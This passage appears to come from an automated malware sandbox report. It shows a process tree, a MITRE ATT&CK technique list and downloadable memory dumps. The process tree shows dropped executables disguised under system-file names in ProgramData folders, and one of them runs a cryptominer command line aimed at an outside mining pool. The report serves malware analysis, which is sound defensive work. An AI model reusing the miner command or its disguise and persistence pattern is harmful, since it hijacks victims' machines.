    PID:5352
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /query /fo list
      4⤵
      PID:5404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig /flushdns
  2⤵
  PID:5496
- - C:\Windows\system32\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:5540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c gpupdate /force
  2⤵
  PID:5560
- - C:\Windows\system32\gpupdate.exe
    gpupdate /force
    3⤵
    PID:5604
- C:\ProgramData\WindowsTask\audiodg.exe
  C:\ProgramData\WindowsTask\audiodg.exe
  2⤵
  - Executes dropped EXE
  PID:3088
- C:\ProgramData\WindowsTask\MicrosoftHost.exe
  C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5500

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1972

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5236

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/560-335-0x0000000007290000-0x0000000007291000-memory.dmp

Filesize
4KB

Download
memory/560-324-0x0000000005260000-0x0000000005261000-memory.dmp

Filesize
4KB

Download
memory/560-331-0x0000000005E20000-0x0000000005E21000-memory.dmp

Filesize
4KB

Download
memory/560-322-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/560-333-0x00000000063C0000-0x00000000063C1000-memory.dmp

Filesize
4KB

Download
memory/560-318-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/560-317-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/560-315-0x0000000000730000-0x0000000000731000-memory.dmp

Filesize
4KB

Download
memory/560-346-0x0000000006AB0000-0x0000000006AB1000-memory.dmp

Filesize
4KB

Download
memory/560-352-0x0000000008370000-0x0000000008371000-memory.dmp

Filesize
4KB

Download
memory/560-334-0x0000000006B90000-0x0000000006B91000-memory.dmp

Filesize
4KB

Download
memory/560-311-0x0000000071560000-0x0000000071C4E000-memory.dmp

Filesize
6.9MB

Download
memory/560-353-0x0000000008460000-0x0000000008461000-memory.dmp

Filesize
4KB

Download
memory/560-323-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/4560-37-0x0000000002F70000-0x0000000002F71000-memory.dmp

Filesize
4KB

Download
memory/4560-39-0x0000000002F70000-0x0000000002F71000-memory.dmp

Filesize
4KB

Download
memory/4560-38-0x0000000003770000-0x0000000003771000-memory.dmp

Filesize
4KB

Download
memory/5500-999-0x00007FF6F7F90000-0x00007FF6F8530000-memory.dmp

Filesize
5.6MB

Download